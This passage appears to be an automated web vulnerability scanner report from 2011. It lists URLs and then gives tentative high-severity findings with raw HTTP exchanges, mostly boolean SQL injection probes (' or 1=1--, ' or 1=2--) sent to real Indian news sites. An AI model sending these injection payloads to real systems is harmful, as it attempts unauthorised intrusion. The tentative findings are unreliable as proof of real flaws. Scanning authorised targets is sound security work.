31.23. http://imp.fetchback.com/serve/fb/adtag.js
31.24. http://lvs.truehits.in.th/goggen.php
31.25. http://mc8tdi0ripmbpds25eboaupdulritrp6-a-fc-opensocial.googleusercontent.com/gadgets/ifr
31.26. http://media1.bangkokpost.com/common/img/bg/bg_directoryhome.jpg
31.27. http://media1.bangkokpost.com/common/img/bg/bg_popular_reader.jpg
31.28. http://msite.martiniadnetwork.com/index/
31.29. http://netspiderads2.indiatimes.com/ads.dll/getxmlad
31.30. http://rtb0.doubleverify.com/rtb.ashx/verifyc
31.31. http://social.ndtv.com/static/Comment/Form/
31.32. http://social.ndtv.com/static/Comment/List/
31.33. http://static.dnaindia.com/images/710/lead-dot-g.png
31.34. http://static.dnaindia.com/images/710/lead-dot-y.png
31.35. http://static.social.ndtv.com/plugins/index.php
31.36. http://timesofindia.indiatimes.com/logtopickeywords.cms
31.37. http://timesofindia.indiatimes.com/recommendedarticles.cms
31.38. http://timesofindia.indiatimes.com/toitopics_comjs_v3.cms
31.39. http://twitterapi.indiatimes.com/feedtweet/tweet
31.40. http://urls.api.twitter.com/1/urls/count.json
31.41. http://web.adblade.com/clicks.php
31.42. http://www.bangkokpost.com/_event.php
31.43. http://www.bangkokpost.com/_getContent_main.php
31.44. http://www.bangkokpost.com/common/js/extras_js.php
31.45. http://www.bangkokpost.com/favicon.ico
31.46. http://www.facebook.com/extern/login_status.php
31.47. http://www.google.com/buzz/api/button.js
31.48. http://www.google.com/search
31.50. http://www.nationmultimedia.com/favicon.ico
31.51. http://www.nationmultimedia.com/home/banner/ad_set1.html
31.52. http://www.nationmultimedia.com/home/banner/weather.html
31.53. http://www.ndtv.com/news/utils/new_ajax_gateway.php
31.54. http://www.scb.co.th/favicon.ico
31.55. http://www.tribalfusion.com/test/opt.js
31.56. http://www9.effectivemeasure.net/v4/em_js
32. Content type is not specified
32.1. http://ads.bluelithium.com/st
32.2. http://vod.l3.cms.performgroup.com:443/open/1
Severity: | High |
Confidence: | Tentative |
Host: | http://stat.synergy-e.com |
Path: | /piwik.php |
GET /piwik.php?action_name Host: stat.synergy-e.com Proxy-Connection: keep-alive Referer: http://www.nationmul User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 02:32:02 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.2.16 Access-Control-Allow Content-Length: 43 Connection: close Content-Type: image/gif GIF89a.............!..... |
GET /piwik.php?action_name Host: stat.synergy-e.com Proxy-Connection: keep-alive Referer: http://www.nationmul User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 02:32:03 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.2.16 Content-Length: 867 Connection: close Content-Type: text/html; charset=utf-8 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html> <head> <title>› Error</title> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <link rel="shortcut icon" href="plugins/CoreHome <link rel="stylesheet" type="text/css" href="themes/default </head> <body> <div id="content"> <div id="title"><img title='UnitusX' alt="UnitusX" src='themes/default <p>Invalid idSite</p><p>Edit the following line in piwik.php to enable tracker debugging and display a backtrace:</p> <blockquote><pre>$GLOBALS </body> </html> |
Severity: | High |
Confidence: | Tentative |
Host: | http://www.mid-day.com |
Path: | /news/index.htm/x26amp |
GET /news15566219'%20or%201%3d1-- Host: www.mid-day.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 403 Forbidden Date: Sun, 04 Sep 2011 14:40:45 GMT Server: Apache Vary: Accept-Encoding Content-Type: text/html; charset=iso-8859-1 Content-Length: 242 Connection: close <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>403 Forbidden</title> </head><body> <h1>Forbidden</h1> <p>You don't have permission to access /news15566219' or 1=1-- /index.htm/x26amp on this server.</p> </body></html> |
GET /news15566219'%20or%201%3d2-- Host: www.mid-day.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Server: Apache Cache-Control: max-age=7200, must-revalidate Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Age: 22 Date: Sun, 04 Sep 2011 04:40:14 GMT Expires: Sun, 04 Sep 2011 16:40:23 GMT Content-Length: 10130 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title>Mid-Day :: Make Work Fun Mr52 :)</title> <link rel="icon" type="image/gif" href="http://www.mid-day <META NAME=DESCRIPTION CONTENT="Sitemap, Information about Mid-day Multimedia, Mid-day newspaper, Radio One, Inqualab, Gujrati Mid-Day, Zing"> <META NAME=KEYWORDS CONTENT="Sitemap, Sitemap Mid-day, Mid-day Multimedia, Mid-day newspaper, Radio One, Inqualab, Gujrati Mid-Day, Gujarati Mid-Day, Zing"> <link rel="stylesheet" type="text/css" href="/css/p6/sectio <script language="Javascript" type="text/javascript" src="/js/template.js">< <script type="text/javascript"> var gaJsHost = (("https:" == document.location document.write(unescape(" </script> <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA pageTracker._trackPa } catch(err) {} </script> <meta name="verify-v1" content="/MGyGcAq/7 <style type="text/css"> #articlelist .heading { padding-top:10px;} #articlelist .slug{ font-family:arial; font-size:12; font-weight:normal; color:#000;} #articlelist .heading a { font-family:arial; font-size:12; font-weight:bold; color:#0072FF; text-decoration:none;} #articlelist .heading a:hover {text-decoration </style> </head> <body> <table width="1000" border="0" align="center" cellpadding="0" cellspacing="0" id= ...[SNIP]... |
Severity: | High |
Confidence: | Tentative |
Host: | http://www.mid-day.com |
Path: | /news/index.htm/x26amp |
GET /news/index.htm21868853'%20or%201%3d1-- Host: www.mid-day.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 403 Forbidden Date: Sun, 04 Sep 2011 14:40:52 GMT Server: Apache Vary: Accept-Encoding Content-Type: text/html; charset=iso-8859-1 Content-Length: 242 Connection: close <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>403 Forbidden</title> </head><body> <h1>Forbidden</h1> <p>You don't have permission to access /news/index.htm21868853' or 1=1-- /x26amp on this server.</p> </body></html> |
GET /news/index.htm21868853'%20or%201%3d2-- Host: www.mid-day.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Server: Apache Cache-Control: max-age=7200, must-revalidate Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Age: 30 Date: Sun, 04 Sep 2011 04:40:22 GMT Expires: Sun, 04 Sep 2011 16:40:23 GMT Content-Length: 10130 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title>Mid-Day :: Make Work Fun Mr52 :)</title> <link rel="icon" type="image/gif" href="http://www.mid-day <META NAME=DESCRIPTION CONTENT="Sitemap, Information about Mid-day Multimedia, Mid-day newspaper, Radio One, Inqualab, Gujrati Mid-Day, Zing"> <META NAME=KEYWORDS CONTENT="Sitemap, Sitemap Mid-day, Mid-day Multimedia, Mid-day newspaper, Radio One, Inqualab, Gujrati Mid-Day, Gujarati Mid-Day, Zing"> <link rel="stylesheet" type="text/css" href="/css/p6/sectio <script language="Javascript" type="text/javascript" src="/js/template.js">< <script type="text/javascript"> var gaJsHost = (("https:" == document.location document.write(unescape(" </script> <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA pageTracker._trackPa } catch(err) {} </script> <meta name="verify-v1" content="/MGyGcAq/7 <style type="text/css"> #articlelist .heading { padding-top:10px;} #articlelist .slug{ font-family:arial; font-size:12; font-weight:normal; color:#000;} #articlelist .heading a { font-family:arial; font-size:12; font-weight:bold; color:#0072FF; text-decoration:none;} #articlelist .heading a:hover {text-decoration </style> </head> <body> <table width="1000" border="0" align="center" cellpadding="0" cellspacing="0" id= ...[SNIP]... |
Severity: | High |
Confidence: | Tentative |
Host: | http://www.mid-day.com |
Path: | /news/index.htm/x26amp |
GET /news/index.htm/x26amp20529597'%20or%201%3d1-- Host: www.mid-day.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 403 Forbidden Date: Sun, 04 Sep 2011 14:40:59 GMT Server: Apache Vary: Accept-Encoding Content-Type: text/html; charset=iso-8859-1 Content-Length: 242 Connection: close <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>403 Forbidden</title> </head><body> <h1>Forbidden</h1> <p>You don't have permission to access /news/index.htm on this server.</p> </body></html> |
GET /news/index.htm/x26amp20529597'%20or%201%3d2-- Host: www.mid-day.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 14:40:59 GMT Server: Apache Cache-Control: max-age=7200, must-revalidate Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title>National News, International News, Foreign Stories, Indian News, Complete coverage of local news from India</title> <link rel="icon" type="image/gif" href="http://www.mid-day <META NAME=DESCRIPTION CONTENT="Get your latest dose of news from MiD DAY, the latest happenings from All around the globe and Mumbai, Bangalore, Delhi, Pune and the rest of India. Read the latest Mumbai News, Mumbai City News, Bangalore City News, latest Bangalore News, Delhi City News, latest Delhi News, Pune City News, latest Pune News"> <META NAME=KEYWORDS CONTENT="International News, Foreign Stories, India city News, India city Search, Indian city Movies, Cricket, Mumbai, mumbai city news, what's on, classifieds, delhi news, bangalore city news, local city, india, india local city news, mumbai, delhi, bangalore, bombay, new delhi"> <link rel="stylesheet" type="text/css" href="/css/p6/sectio <script language="Javascript" type="text/javascript" src="/js/template.js">< <script type="text/javascript"> var gaJsHost = (("https:" == document.location document.write(unescape(" </script> <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA pageTracker._trackPa } catch(err) {} </script> <meta name="verify-v1" content="/MGyGcAq/7 <style type="text/css"> #polliframe {height: 250px;} #masthead .mm1 {color:#fff; background-colo ...[SNIP]... |
Severity: | High |
Confidence: | Tentative |
Host: | http://www.mid-day.com |
Path: | /news/index.htm/x26amp |
GET /news/index.htm/x26amp?110092521%20or%201%3d1-- Host: www.mid-day.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 403 Forbidden Date: Sun, 04 Sep 2011 14:40:36 GMT Server: Apache Vary: Accept-Encoding Content-Type: text/html; charset=iso-8859-1 Content-Length: 223 Connection: close <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>403 Forbidden</title> </head><body> <h1>Forbidden</h1> <p>You don't have permission to access /news/index.htm/x26amp on this server.</p> </body></html> |
GET /news/index.htm/x26amp?110092521%20or%201%3d2-- Host: www.mid-day.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 14:40:36 GMT Server: Apache Cache-Control: max-age=7200, must-revalidate Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title>National News, International News, Foreign Stories, Indian News, Complete coverage of local news from India</title> <link rel="icon" type="image/gif" href="http://www.mid-day <META NAME=DESCRIPTION CONTENT="Get your latest dose of news from MiD DAY, the latest happenings from All around the globe and Mumbai, Bangalore, Delhi, Pune and the rest of India. Read the latest Mumbai News, Mumbai City News, Bangalore City News, latest Bangalore News, Delhi City News, latest Delhi News, Pune City News, latest Pune News"> <META NAME=KEYWORDS CONTENT="International News, Foreign Stories, India city News, India city Search, Indian city Movies, Cricket, Mumbai, mumbai city news, what's on, classifieds, delhi news, bangalore city news, local city, india, india local city news, mumbai, delhi, bangalore, bombay, new delhi"> <link rel="stylesheet" type="text/css" href="/css/p6/sectio <script language="Javascript" type="text/javascript" src="/js/template.js">< <script type="text/javascript"> var gaJsHost = (("https:" == document.location document.write(unescape(" </script> <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA pageTracker._trackPa } catch(err) {} </script> <meta name="verify-v1" content="/MGyGcAq/7 <style type="text/css"> #polliframe {height: 250px;} #masthead .mm1 {color:#fff; background-colo ...[SNIP]... |
Severity: | High |
Confidence: | Tentative |
Host: | http://www.mid-day.com |
Path: | /news/local/index.htm |
GET /news20746183'%20or%201%3d1-- Host: www.mid-day.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 403 Forbidden Date: Sun, 04 Sep 2011 14:40:36 GMT Server: Apache Vary: Accept-Encoding Content-Type: text/html; charset=iso-8859-1 Content-Length: 248 Connection: close <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>403 Forbidden</title> </head><body> <h1>Forbidden</h1> <p>You don't have permission to access /news20746183' or 1=1-- /local/index.htm/x26amp on this server.</p> </body></html> |
GET /news20746183'%20or%201%3d2-- Host: www.mid-day.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Server: Apache Cache-Control: max-age=7200, must-revalidate Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Age: 13 Date: Sun, 04 Sep 2011 04:40:05 GMT Expires: Sun, 04 Sep 2011 16:40:23 GMT Content-Length: 10130 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title>Mid-Day :: Make Work Fun Mr52 :)</title> <link rel="icon" type="image/gif" href="http://www.mid-day <META NAME=DESCRIPTION CONTENT="Sitemap, Information about Mid-day Multimedia, Mid-day newspaper, Radio One, Inqualab, Gujrati Mid-Day, Zing"> <META NAME=KEYWORDS CONTENT="Sitemap, Sitemap Mid-day, Mid-day Multimedia, Mid-day newspaper, Radio One, Inqualab, Gujrati Mid-Day, Gujarati Mid-Day, Zing"> <link rel="stylesheet" type="text/css" href="/css/p6/sectio <script language="Javascript" type="text/javascript" src="/js/template.js">< <script type="text/javascript"> var gaJsHost = (("https:" == document.location document.write(unescape(" </script> <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA pageTracker._trackPa } catch(err) {} </script> <meta name="verify-v1" content="/MGyGcAq/7 <style type="text/css"> #articlelist .heading { padding-top:10px;} #articlelist .slug{ font-family:arial; font-size:12; font-weight:normal; color:#000;} #articlelist .heading a { font-family:arial; font-size:12; font-weight:bold; color:#0072FF; text-decoration:none;} #articlelist .heading a:hover {text-decoration </style> </head> <body> <table width="1000" border="0" align="center" cellpadding="0" cellspacing="0" id= ...[SNIP]... |
Severity: | High |
Confidence: | Tentative |
Host: | http://www.mid-day.com |
Path: | /news/local/index.htm |
GET /news/local11545130'%20or%201%3d1-- Host: www.mid-day.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 403 Forbidden Date: Sun, 04 Sep 2011 14:40:44 GMT Server: Apache Vary: Accept-Encoding Content-Type: text/html; charset=iso-8859-1 Content-Length: 248 Connection: close <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>403 Forbidden</title> </head><body> <h1>Forbidden</h1> <p>You don't have permission to access /news/local11545130' or 1=1-- /index.htm/x26amp on this server.</p> </body></html> |
GET /news/local11545130'%20or%201%3d2-- Host: www.mid-day.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Server: Apache Cache-Control: max-age=7200, must-revalidate Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Age: 21 Date: Sun, 04 Sep 2011 04:40:13 GMT Expires: Sun, 04 Sep 2011 16:40:23 GMT Content-Length: 10130 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title>Mid-Day :: Make Work Fun Mr52 :)</title> <link rel="icon" type="image/gif" href="http://www.mid-day <META NAME=DESCRIPTION CONTENT="Sitemap, Information about Mid-day Multimedia, Mid-day newspaper, Radio One, Inqualab, Gujrati Mid-Day, Zing"> <META NAME=KEYWORDS CONTENT="Sitemap, Sitemap Mid-day, Mid-day Multimedia, Mid-day newspaper, Radio One, Inqualab, Gujrati Mid-Day, Gujarati Mid-Day, Zing"> <link rel="stylesheet" type="text/css" href="/css/p6/sectio <script language="Javascript" type="text/javascript" src="/js/template.js">< <script type="text/javascript"> var gaJsHost = (("https:" == document.location document.write(unescape(" </script> <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA pageTracker._trackPa } catch(err) {} </script> <meta name="verify-v1" content="/MGyGcAq/7 <style type="text/css"> #articlelist .heading { padding-top:10px;} #articlelist .slug{ font-family:arial; font-size:12; font-weight:normal; color:#000;} #articlelist .heading a { font-family:arial; font-size:12; font-weight:bold; color:#0072FF; text-decoration:none;} #articlelist .heading a:hover {text-decoration </style> </head> <body> <table width="1000" border="0" align="center" cellpadding="0" cellspacing="0" id= ...[SNIP]... |
Severity: | High |
Confidence: | Tentative |
Host: | http://www.mid-day.com |
Path: | /news/local/index.htm |
GET /news/local/index.htm20305888'%20or%201%3d1-- Host: www.mid-day.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 403 Forbidden Date: Sun, 04 Sep 2011 14:40:50 GMT Server: Apache Vary: Accept-Encoding Content-Type: text/html; charset=iso-8859-1 Content-Length: 248 Connection: close <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>403 Forbidden</title> </head><body> <h1>Forbidden</h1> <p>You don't have permission to access /news/local/index on this server.</p> </body></html> |
GET /news/local/index.htm20305888'%20or%201%3d2-- Host: www.mid-day.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Server: Apache Cache-Control: max-age=7200, must-revalidate Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Age: 27 Date: Sun, 04 Sep 2011 04:40:19 GMT Expires: Sun, 04 Sep 2011 16:40:23 GMT Content-Length: 10130 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title>Mid-Day :: Make Work Fun Mr52 :)</title> <link rel="icon" type="image/gif" href="http://www.mid-day <META NAME=DESCRIPTION CONTENT="Sitemap, Information about Mid-day Multimedia, Mid-day newspaper, Radio One, Inqualab, Gujrati Mid-Day, Zing"> <META NAME=KEYWORDS CONTENT="Sitemap, Sitemap Mid-day, Mid-day Multimedia, Mid-day newspaper, Radio One, Inqualab, Gujrati Mid-Day, Gujarati Mid-Day, Zing"> <link rel="stylesheet" type="text/css" href="/css/p6/sectio <script language="Javascript" type="text/javascript" src="/js/template.js">< <script type="text/javascript"> var gaJsHost = (("https:" == document.location document.write(unescape(" </script> <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA pageTracker._trackPa } catch(err) {} </script> <meta name="verify-v1" content="/MGyGcAq/7 <style type="text/css"> #articlelist .heading { padding-top:10px;} #articlelist .slug{ font-family:arial; font-size:12; font-weight:normal; color:#000;} #articlelist .heading a { font-family:arial; font-size:12; font-weight:bold; color:#0072FF; text-decoration:none;} #articlelist .heading a:hover {text-decoration </style> </head> <body> <table width="1000" border="0" align="center" cellpadding="0" cellspacing="0" id= ...[SNIP]... |
Severity: | High |
Confidence: | Tentative |
Host: | http://www.mid-day.com |
Path: | /news/local/index.htm |
GET /news/local/index.htm Host: www.mid-day.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 403 Forbidden Date: Sun, 04 Sep 2011 14:40:58 GMT Server: Apache Vary: Accept-Encoding Content-Type: text/html; charset=iso-8859-1 Content-Length: 248 Connection: close <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>403 Forbidden</title> </head><body> <h1>Forbidden</h1> <p>You don't have permission to access /news/local/index.htm on this server.</p> </body></html> |
GET /news/local/index.htm Host: www.mid-day.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 14:40:59 GMT Server: Apache Cache-Control: max-age=7200, must-revalidate Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title>Local News - National News, Indian News, Complete coverage of local news from India</title> <link rel="icon" type="image/gif" href="http://www.mid-day <META NAME=DESCRIPTION CONTENT="Get your latest dose of local Indian news from MiD DAY, the latest happenings from Mumbai, Bangalore, Delhi, Pune and the rest of India. News, Opinion, Entertaintment, Sports, life@Work, Comics & Fun, Sex & Relationship, What's On, Specials, Lifestyle. Read the latest Mumbai News, local Mumbai City News, local Bangalore City News, latest Bangalore News, local Delhi City News, latest Delhi News, local Pune City News, latest Pune News"> <META NAME=KEYWORDS CONTENT="Local news, Local Indian news, india news, India city News, India city Search, Indian city Movies, Cricket, Mumbai, mumbai city news, what's on, classifieds, delhi news, bangalore city news, local city, india, india local city news, mumbai, delhi, bangalore"> <link rel="stylesheet" type="text/css" href="/css/pV/sectio <link rel="stylesheet" type="text/css" href="/css/pV/ddleve <link rel="stylesheet" type="text/css" href="/css/pV/ddleve <script language="Javascript" type="text/javascript" src="/js/realmedia.js">< <script language="Javascript" type="text/javascript" src="/js/template.js">< <script language="Javascript" type="text/javascript" src="/js/pV/ddlevelsmenu <script type="text/javascript"> var gaJsHost = (("https:" == document.location document.write(unescape(" ...[SNIP]... |
Severity: | High |
Confidence: | Tentative |
Host: | http://www.mid-day.com |
Path: | /news/local/index.htm |
GET /news/local/index.htm Host: www.mid-day.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 403 Forbidden Date: Sun, 04 Sep 2011 14:40:30 GMT Server: Apache Vary: Accept-Encoding Content-Type: text/html; charset=iso-8859-1 Content-Length: 229 Connection: close <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>403 Forbidden</title> </head><body> <h1>Forbidden</h1> <p>You don't have permission to access /news/local/index.htm on this server.</p> </body></html> |
GET /news/local/index.htm Host: www.mid-day.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 14:40:30 GMT Server: Apache Cache-Control: max-age=7200, must-revalidate Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title>Local News - National News, Indian News, Complete coverage of local news from India</title> <link rel="icon" type="image/gif" href="http://www.mid-day <META NAME=DESCRIPTION CONTENT="Get your latest dose of local Indian news from MiD DAY, the latest happenings from Mumbai, Bangalore, Delhi, Pune and the rest of India. News, Opinion, Entertaintment, Sports, life@Work, Comics & Fun, Sex & Relationship, What's On, Specials, Lifestyle. Read the latest Mumbai News, local Mumbai City News, local Bangalore City News, latest Bangalore News, local Delhi City News, latest Delhi News, local Pune City News, latest Pune News"> <META NAME=KEYWORDS CONTENT="Local news, Local Indian news, india news, India city News, India city Search, Indian city Movies, Cricket, Mumbai, mumbai city news, what's on, classifieds, delhi news, bangalore city news, local city, india, india local city news, mumbai, delhi, bangalore"> <link rel="stylesheet" type="text/css" href="/css/pV/sectio <link rel="stylesheet" type="text/css" href="/css/pV/ddleve <link rel="stylesheet" type="text/css" href="/css/pV/ddleve <script language="Javascript" type="text/javascript" src="/js/realmedia.js">< <script language="Javascript" type="text/javascript" src="/js/template.js">< <script language="Javascript" type="text/javascript" src="/js/pV/ddlevelsmenu <script type="text/javascript"> var gaJsHost = (("https:" == document.location document.write(unescape(" ...[SNIP]... |
Severity: | High |
Confidence: | Tentative |
Host: | http://www.ndtv.com |
Path: | /article/india/48-hours |
GET /article/india/48-hours Host: www.ndtv.com Proxy-Connection: keep-alive Referer: http://www.google.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Content-Type: text/html Pragma: public Server: Apache/2.2.14 (Ubuntu) Vary: Accept-Encoding X-Powered-By: PHP/5.3.2-1ubuntu4.9 Content-Length: 69784 Cache-Control: max-age=120 Expires: Sun, 04 Sep 2011 02:34:22 GMT Date: Sun, 04 Sep 2011 02:32:22 GMT Connection: close <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR ...[SNIP]... </li> </ul> </div> <div class="clr"></div> <div class="also_see_n"> <a class="prev prev_browse left"></a> <div class="scrollable"> <div class="items"> <div class="item"> <a href="/video/player/news <img src="http://drop.ndtv.com <span>Mumbai airport runway revamped</span> </a> </div> <div class="item"> <a href="/video/player/news <img src="http://drop.ndtv.com <span>Bipasha detained at Mumbai airport</span> </a> </div> <div class="item"> <a href="/video/player/news <img src="http://drop.ndtv.com <span>Minissha Lamba detained at Mumbai airport</span> </a> </div> <div class="item"> <a href="/video/player/news <img src="http://drop.ndtv.com <span>Pilots' strike: Chaos, nightmare inside airpo ...</span> </a> ...[SNIP]... |
GET /article/india/48-hours Host: www.ndtv.com Proxy-Connection: keep-alive Referer: http://www.google.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Content-Type: text/html Pragma: public Server: Apache/2.2.14 (Ubuntu) Vary: Accept-Encoding X-Powered-By: PHP/5.3.2-1ubuntu4.9 Content-Length: 70003 Cache-Control: max-age=117 Expires: Sun, 04 Sep 2011 02:34:19 GMT Date: Sun, 04 Sep 2011 02:32:22 GMT Connection: close <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR ...[SNIP]... </li> <li><a href="http://www.ndtv.com </ul> </div> <div class="clr"></div> <div class="also_see_n"> <a class="prev prev_browse left"></a> <div class="scrollable"> <div class="items"> <div class="item"> <a href="/video/player/news <img src="http://drop.ndtv.com <span>Mumbai airport runway revamped</span> </a> </div> <div class="item"> <a href="/video/player/news <img src="http://drop.ndtv.com <span>Bipasha detained at Mumbai airport</span> </a> </div> <div class="item"> <a href="/video/player/news <img src="http://drop.ndtv.com <span>Minissha Lamba detained at Mumbai airport</span> </a> </div> <div class="item"> <a href="/video/player/news < ...[SNIP]... |
Severity: | High |
Confidence: | Tentative |
Host: | http://www.ndtv.com |
Path: | /article/india/turkish |
GET /article/india17974436'%20or%201%3d1-- Host: www.ndtv.com Proxy-Connection: keep-alive Referer: http://www.ndtv.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: OAS_SC1=1315103177650; __utma=165355488 |
